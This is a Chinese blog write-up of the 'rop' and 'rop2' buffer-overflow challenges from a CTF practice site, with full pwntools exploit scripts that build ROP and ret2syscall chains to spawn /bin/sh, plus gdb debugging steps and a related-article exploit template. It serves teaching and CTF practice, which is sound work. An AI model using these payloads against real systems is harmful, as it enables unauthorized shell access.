rop和rop2的题目的wp

最新推荐文章于 2025-03-23 01:48:00 发布
最新推荐文章于 2025-03-23 01:48:00 发布
阅读量4.6k 收藏 3
点赞数 1
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78259866
版权

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习
首先先是rop这个题目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做题的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/10022831下载
rop的要求是:

nc hackme.inndy.tw 7704
Tips: Buffer Overflow, ROP

把rop直接拖入ida中
main函数:
image
overflow函数:
image
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
看到NX enabled是开启了栈不可执行,这时ROP就有应用空间了
这个程序很简单,就一个gets函数,所以栈溢出就好了
这个程序似乎是用的静态库,所以我用readelf -d rop来查看一下
image
果然是静态库,这时候推荐一个ppt讲的很好https://www.slideshare.net/hackstuff/rop-40525248,遇到这种题目推荐一个工具很不错:https://github.com/JonathanSalwan/ROPgadget/tree/master
首先这个题目只要输入20个a就可以覆盖函数返回值了
这个题目如果用工具的话也很简单,直接用ROPgadget –binary rop –ropchain 就可以生成好rop利用链了,一点都不用操心,真不错
image

然后我都exp就是: 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
from struct import pack
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x08048892'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)

shellcode="/home/flag"
#  print disasm(shellcode)

elf = ELF('/home/h11p/hackme/rop')
#printf_addr = elf.symbols['printf']
#print "%x" % printf_addr
bss_addr = elf.bss()
print "%x" % bss_addr
offset = 16

#io = process('/home/h11p/hackme/rop')

io = remote('hackme.inndy.tw', 7704)
#bof=0x080488B7
#payload = 'A' * offset

###ROPgadget --binary ~/hackme/rop --ropchain
###https://www.slideshare.net/hackstuff/rop-40525248
    # Padding goes here
p = 'A' * offset
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

#debug()
io.sendline(p)
io.interactive()
io.close()

看一下效果:
image

下面介绍rop2这个题目,这个题目很有趣
rop2下载地址就在https://hackme.inndy.tw/scoreboard/,如果做题的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/10022836下载
rop2的要求是:

nc hackme.inndy.tw 7703
ROPgadget not working anymore

把rop直接拖入ida中
main函数:
image
overflow函数:
image
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
看到NX enabled是开启了栈不可执行,这时ROP就有应用空间了
这个程序很有趣,输入和输出都是用的syscall这个函数,关于syscall函数参考:http://blog.chinaunix.net/uid-28458801-id-4630215.htmlhttp://www.cnblogs.com/hazir/p/three_methods_of_syscall.html 这两个文章,syscall的第一个参数是系统调用的宏,后面的参数是系统调用所用的参数,这个宏具体可参考/usr/include/x86_64-linux-gnu/asm/unistd_32.h
image
可以看到输出是3,输出是4,执行系统命令是11,关于execve函数这篇文章讲的很不错http://blog.csdn.net/chichoxian/article/details/53486131,如果想用execve得到一个交互的shell的话,可以这样调用:execve(“/bin//sh”,NULL,NULL);
所以我就有一个想法,这里还是首先感谢M4x的点拨,M4x师傅真是太厉害了,首先,利用溢出后跳到main函数中这个syscall这个函数里面,并且传递参数(3,0,bss,8),意思就是在.bss里面写入payload,也就是/bin//sh,然后再利用overflow的溢出再次跳到main函数中这个syscall这个函数里面,此时传递的参数是(11,bss,null,null),就相当于执行了execve(“/bin//sh”,NULL,NULL); 这个函数一样,这样就可以得到shell了
下面是我的exp: 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
import time
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x8048485'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)


elf = ELF('/home/h11p/hackme/rop2')
bss_addr = elf.bss()
print "%x" % bss_addr

shellcode='/bin//sh'
#shellcode=p32(0x0804847C)
elf = ELF('/home/h11p/hackme/rop2')
offset = 16

io = process('/home/h11p/hackme/rop2')

#io = remote('hackme.inndy.tw', 7703)

payload = 'a'*4 +'b'*4+'c'*4
payload += p32(0x080484FF)
payload += p32(0x080484FF)
#payload += p32(0x0804B054)
payload += p32(0x3)
payload += p32(0x0)
payload += p32(bss_addr)  #.bss
payload += p32(0x8)


payload2 = 'a'*4 +'b'*4+'c'*4
payload2 += p32(0x080484FF)
payload2 += p32(0x080484FF)
#payload += p32(0x0804B054)
payload2 += p32(0xb)
payload2 += p32(bss_addr)  #.bss
payload2 += p32(0x0)
payload2 += p32(0x0)

debug()
io.recvuntil('Can you solve this?\nGive me your ropchain:')
io.sendline(payload)
io.readline()
io.send(shellcode)
io.recvline(timeout=3)
io.sendline(payload2)

io.interactive()

io.close()

我来调试一下,首先把断点放在0x8048485这个地方,也就是overflow结尾的地方
image
这里有个坑,就是溢出后执行到overflow后面的leave;ret;会有堆栈不平衡的现象,明明溢出的地方在输入16个a之后的四个字节的地方,而leave指令相当于(mov ebp esp;pop ebp),而多出的ebp在输入12个a之后的四个字节中,这样的如果你的payloa是”a”*16+syscall_addr,那么程序在执行完overflow这个函数之后gdb就会崩溃
为了演示这个坑,我把exp中的payload改成

payload = 'a'*16
#payload += p32(0x080484ff)
payload += p32(0x080484FF)
#payload += p32(0x0804B054)
payload += p32(0x3)
payload += p32(0x0)
payload += p32(bss_addr)  #.bss
payload += p32(0x8)

image

所以在输入完12个a之后,再输入的四个字节应该是一个可读的地址空间,这个空间我选的是0x080484ff
所以paylaod就是:

payload2 = 'a'*4 +'b'*4+'c'*4
payload2 += p32(0x080484FF)
payload2 += p32(0x080484FF)
#payload += p32(0x0804B054)
payload2 += p32(0xb)
payload2 += p32(bss_addr)  #.bss
payload2 += p32(0x0)
payload2 += p32(0x0)

解决完上面的坑之后继续往下走
溢出后跳入到main函数中的syscall(也就是080484FF)这个位置
image
这里看到传递的参数是(3,0,bss,8),程序向下又执行到了overflow这个函数中
image
此时再发出一个paylaod来溢出这个函数 

payload2 = 'a'*4 +'b'*4+'c'*4
payload2 += p32(0x080484FF)
payload2 += p32(0x080484FF)
payload2 += p32(0xb)
payload2 += p32(bss_addr)  #.bss
payload2 += p32(0x0)
payload2 += p32(0x0)

在gdb中输入c发现又断在了0x8048485这个地址
image
继续输入n向下执行,发现又跳到main函数中的syscall(也就是080484FF)这个位置
image
这里看到传递的参数是(11,bss,0,0),这里相当于执行execve(“/bin//sh”,NULL,NULL); 继续执行就成功了
来看一下效果
image

下面我放上M4x师傅写的exp 

#!/usr/bin/env python
# -*- coding: utf-8 -*-
__Auther__ = 'M4x'

from pwn import *
context(log_level = "debug", terminal = ["deepin-terminal", "-x", "sh", "-c"])

elf = ELF("./rop2")
syscall_addr = elf.symbols["syscall"]
bss_addr = elf.bss()
ppppr_addr = 0x08048578

payload = fit({0xC + 0x4: [p32(syscall_addr), p32(ppppr_addr), p32(3), p32(0), p32(bss_addr), p32(8)]})
payload += fit({0x0: [p32(syscall_addr), p32(0xdeadbeef), p32(11), p32(bss_addr), p32(0), p32(0)]})

io = process("./rop2")
io.sendlineafter("your ropchain:", payload)
io.send("/bin/sh\0")
io.interactive()
io.close()

经过调试发现,M4x师傅在溢出后就跳入到.got.plt表的中的syscall的地方,并且传入参数
image
调用完syscall之后,利用rop把传入syscall的参数弹出,使堆栈平衡
image
image
然后再调用syscall,并传入(11,bss,0,0)
image
getshell
image

深入探究64位rop链构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 2021
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一题做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
BUUCTF 铁人三项(第五赛区)_2018_rop
2401_88087539的博客
01-17 311
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
rop and rop2 wp
zszcr的博客
04-02 552
题目来源:国外的一个ctf平台https://hackme.inndy.tw/ rop题目提示:ROP buffer overflow 很明显是一个栈溢出 要用rop来获取shell防护机制发现至开启了NX 拖到IDA反编译一下 可以看到有很多函数 ,不管是用到的还是没用的都有,说明它的是静态连接我们可以通过ROPgadget 来直接构造ropchain命令为 ROPgadget --binary...
Ret2syscall(超详细)
最新发布
m0_68956519的博客
03-23 1088
(System Call)是操作系统提供给应用程序的接口,允许应用程序请求操作系统内核执行某些特权操作。由于操作系统内核运行在更高的特权级别(如x86架构中的),普通应用程序(运行在)无法直接访问硬件资源或执行某些敏感操作(如文件读写、进程管理、网络通信等)。因此,应用程序需要通过系统调用来请求内核完成这些操作。我用自己的话说就是设置对应寄存器的值,达到调用系统函数的过程下面是对应的系统调用表Linux X86架构 32 64系统调用表_32位 syscall-CSDN博客。
buuctf-pwn-inndy_rop-wp
xuaohu123的博客
01-08 380
buuctf-pwn-innd_rop 查看文件保护 32位程序,开启了nx保护。
ROP2 ROP的启蒙题
snowleopard_bin的博客
08-05 436
from pwn import * cn = remote('hackme.inndy.tw',7703) #context.log_level='debug' elf = ELF('rop2') syscall = elf.symbols['syscall'] print "%x"%syscall over = elf.symbols['overflow'] bss = elf.bss() ...
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
攻防世界-pwn stack2(ROP)
菜的只能随便写写博客
10-28 2016
0x01 文件分析 32位elf 无PIE   0x02 运行分析  程序的功能主要有四个,在输入前面两个初始化的变量值之后,就可以看到后面的几个功能。   0x03 IDA分析 //IDA 静态分析得出的代码: int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax uns...
ROP Emporium一系列题
weixin_44296844的博客
12-21 581
Rop Emporium 最近在学习ROP,发现ROP Emporium这个网站上题目挺好,就一直在做,我这里用到查gadget的工具是ROPgadget,其他工具也是可以的。因为是直接从笔记上粘贴的,所以没有排版啥的,。。 ret2win_32 简单的覆盖返回地址跳转到后门函数 #coding="utf-8" from pwn import * sh=process("./ret2win3...
一种比较麻烦的Rop链构造——ret2dlresolve
dydxdz的博客
04-09 3955
ret2resolve 题目:0ctf 2018 babystack 上周末做了TCTF(0ctf 2018)的新人赛,题目难度适中,但垃圾如我一如既往没有做出几道题。在7o8v大佬的帮助下,弄懂了babystack的考察点ret2resolve的利用原理,因此对照着wp记录一波。 0x01 ret2dlresolve原理 当一个程序第一次调用libc中的函数时,必须首先对libc中...
exrop:自动ROPChain生成
04-23
多余的 Exrop是自动ROP链生成器工具,可以根据给定的二进制文件约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将寄存器设置为寄存器( rdi=rax ) 写给内存 将字符串/字节写入内存 函数调用( open('/etc/passwd',0) ) 函数调用中的传递寄存器( read('rax', bss, 0x100) ) 避免坏蛋 堆栈Exrop.stack_pivot ( Exrop.stack_pivot ) syscall( Exrop.syscall ) 看 安装 安装python(推荐并测试3.6) 安装triton( ),确保将-DPYTHON36=on添加为cmake选项 安装ropgadget(
SetROP2
I am a coder
03-25 3822
<br />CDC::SetROP2<br />int SetROP2(int nDrawMode);<br />返回值:绘图模式的前一次取值。可以取联机文档“Windows SDK”中提供的任意值。<br />参数: nDrawMode 指定新的绘制模式,可以为下列值之一:<br />· R2_BLACK 像素始终为黑色。  <br />· R2_WHITE 像素始终为白色。  <br />· R2_NOP 像素保持不变。  <br />· R2_NOT 像素为屏幕颜色的反色。  <br />· R2_C
rop2
weixin_30713953的博客
06-04 117
根据nDrawMode设置的方式重新设定绘图的方式,下面就不同的nDrawMode值具体解释绘图模式是如何改变的。   首先就nDrawMode的取值有以下的情况:    1、R2_BLACKPixel is always black. //所有绘制出来的像素为黑色   2、R2_WHITEPixel is always white. //所有绘制出来的像素为白色    3、R2_NOPPi...
pwn --rop
Vccxx的博客
04-08 2098
rop练习—Very Secure Systemrop 真爽。。题目链接:http://pan.baidu.com/s/1eSd0XTg 注:.bak是原题,原题有个过10s自动退出程序的设置,不好调试,我用ida打了个patch,就是另一个文件,两个文件只有这一个区别漏洞分析:这个程序是静态加载的,所以got表没有用,顺带dynelf也不行,也没提供libc。但是有一个函数可以溢出,但是只溢出了
[pwn]ROP:三道题讲解花式绕过Canary栈保护
热门推荐
Breeze的博客
08-26 1万+
文章目录绕过Canary栈保护Canary栈保护babystack writeupMary_Morton writeup 绕过Canary栈保护 Canary栈保护 Canary是一种栈保护手段,通常通过在栈中插入cookie信息(一般在ebp上方),在函数返回的时候检查cookie是否改变,如果改变则认为栈结构被破坏,则调用一个函数强制停止程序。当开启Canary保护的时候不能通过传统的栈溢出直...
Windows16种二元光栅操作(ROP2)运算方式
hopyGreat的博客
01-02 3137
本文参考自 《Windows程序设计(第5版,珍藏版)》显示器上所显示的线条外观受定义在设备环境中的绘图模式影响。画一条直线,其颜色由画笔的颜色画线显示区域的颜色共同确定。当Windows使用一个画笔绘制直线时, 它实际上是在将画笔的像素颜色目标显示表面的像素颜色按位进行布尔运算。对像素颜色执行一个按位布尔运算称为“光栅操作”(raster operation, ROP),简称ROP。因为绘制
绘图模式--SetROP2
因热爱而执着,因执着而成功。
10-03 1800
设备内容中定义的绘图方式也影响显示器上所画线的外观。设想画这样一条直线,它的色彩由画笔色彩画线区域原来的色彩共同决定。设想用同一种画笔在白色表面上画出黑线而在黑色表面上画出白线,而且不用知道表面是什么色彩。这样的功能对您有用吗?通过绘图方式的设定,这些都可以实作。       当Windows使用画笔来画线时,它实际上执行画笔图素与目标位置处原来图素之间的某种位布尔运算。图素间的位布尔运算
2025 西湖论剑 WP Pwn
03-13
### 2025年西湖论剑WP Pwn比赛详情及相关信息 #### 比赛背景 2025年的第八届西湖论剑网络安全技能大赛中的Pwn部分,作为一项高水平的技术竞赛吸引了众多安全研究者技术爱好者参与[^1]。该赛事主要考察选手在二进制漏洞挖掘与利用方面的技术能力。 #### 参赛队伍概况 虽然具体参赛队伍名单未完全公开,但从往届情况来看,通常由国内外知名高校的安全团队、企业内部红队以及独立白帽黑客组成。这些队伍通过预选赛晋级决赛阶段,在比赛中展示其卓越的技术实力快速解决问题的能力[^4]。 #### 解题思路概述 以下是基于已有资料总结的一些典型Pwn题目及其解决方法: 1. **Canary泄露与栈溢出** - 题目可能设置了栈保护机制(Stack Canary),攻击者需先通过某种方式泄露Canary值。 - 利用缓冲区溢出覆盖返回地址,并结合ROP链调用`system("/bin/sh")`完成提权操作。 2. **堆风水与UAF (Use After Free)** - 堆管理错误是常见的一类漏洞形式之一。例如程序可能存在释放后重用指针或者大小计算不当等问题。 - 攻击策略包括调整内存布局使得特定数据结构被可控内容填充;进而伪造chunk header实现任意读写功能[^3]。 3. **格式化字符串漏洞** - 当输入参数未经严格校验便传递给printf系列函数时,则可能发生此类问题。 - 使用这种方法可以探知目标进程内部状态(如基址偏移量),为进一步构建payload奠定基础[^2]。 4. **Return-Oriented Programming (ROP) 技巧应用** - 对于开启了NX(non-executable stack)防护措施的目标环境来说,单纯注入shellcode难以奏效。 - 此刻就需要寻找gadgets组合起来执行所需命令序列。 ```python from pwn import * context.arch = 'amd64' elf = ELF('./vuln') libc = elf.libc # Establish connection to service or binary locally/remote. if args.REMOTE: io = remote('challenge.example.com', 1337) else: io = process([elf.path]) # Leak canary value via format string bug. io.recvuntil(b'What is your name? ') fmt_str_payload = b'%15$p.%19$p.' io.sendline(fmt_str_payload) leaked_data = io.recvline().strip() stack_canary, libc_base_leak = map(lambda x:int(x,16), leaked_data.split(b'.')) log.info(f'Stack Canary Value:{hex(stack_canary)}') # Calculate actual addresses based on leaks. base_addr_offset = u64(libc_base_leak.ljust(8,b'\x00')) - libc.symbols['puts'] system_plt = base_addr_offset + libc.symbols['system'] pop_rdi_ret_gadget = next(elf.search(asm('pop rdi; ret'))) bin_sh_string_loc = next(elf.search(b'/bin/sh\x00')) exploit_chain = flat([ pop_rdi_ret_gadget, bin_sh_string_loc, system_plt ]) offset_to_overwrite_return_address = cyclic_find(0x61616161) # Replace with correct offset found during fuzzing phase. final_exploit_buffer = fit({ offset_to_overwrite_return_address : exploit_chain },filler=b'A'*offset_to_overwrite_return_address) io.interactive() if args.DEBUG else None ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值